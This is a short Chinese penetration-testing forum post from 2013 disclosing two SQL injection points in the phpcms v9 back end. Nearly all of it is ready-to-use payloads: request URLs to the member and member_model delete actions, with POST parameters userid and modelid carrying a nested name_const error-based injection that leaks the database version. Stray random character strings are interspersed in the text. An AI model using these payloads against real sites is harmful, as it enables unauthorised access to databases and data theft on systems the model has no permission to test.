中国网络渗透测试联盟

标题: phpcms两处后台的SQL注入 [打印本页]
作者: admin    时间: 2013-7-27 18:33
标题: phpcms两处后台的SQL注入
(一):9 z, a% v3 C* }- Z6 a

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)


6 n+ l4 [( N+ b) D, ~- G- W- b( F

' z6 j! h) U. m7 d

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2